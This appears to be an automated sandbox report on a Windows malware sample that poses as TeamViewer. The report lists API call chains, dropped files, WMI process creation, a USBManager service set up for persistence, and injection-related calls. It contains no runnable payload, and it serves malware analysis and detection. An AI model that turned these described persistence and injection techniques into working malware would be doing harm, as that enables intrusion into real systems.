Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,GetComputerNameExW,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,lstrcmp,lstrcmp,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,lstrcmp,lstrcmp,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF18D0 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFAE20 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB270 NtResumeThread,NtClose,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFADE0 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB1F0 NtSuspendThread,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFAD39 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFA500 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: No import functions for PE file found
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: 77Etc0bR2v.exeVirustotal: Detection: 37%
Source: 77Etc0bR2v.exeReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\user\Desktop\77Etc0bR2v.exe
Source: 77Etc0bR2v.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Local\Temp\nsa6984.tmp
Source: classification engineClassification label: mal80.evad.winEXE@22/12@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF29D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,753CA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF96D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3C60 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAPEAAAAA
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4012:120:WilError_01
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF4E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile created: C:\Program Files (x86)\QS
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exeStatic file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFC101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0075C004 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053E60D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053BD8D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0075BFE4 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFC101 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFC101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C1E67 push edx; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C062B push edi; retf 0019h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C181B push ebp; retf 006Bh
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026CA91B push edx; retn 0064h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C1AF3 push esp; retf 0078h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C12D7 push ebp; retf 0054h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C15B2 push ebp; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026E3A8E push eax; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AD4F0 push esp; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AD070 push eax; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AFB5E push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AF306 push eax; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026B2686 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026CC376 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026CCC32 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026C9888 push eax; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026C9D08 push esp; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_02813210 push eax; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027DFBC7 push es; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B6650 push cs; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B6A3C push es; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B7732 push esi; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B770F push ss; ret
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF44D0 FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,GetPrivateProfileIntA,InvertRect,InvertRect,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InvertRect,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,InvertRect,InvertRect,FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
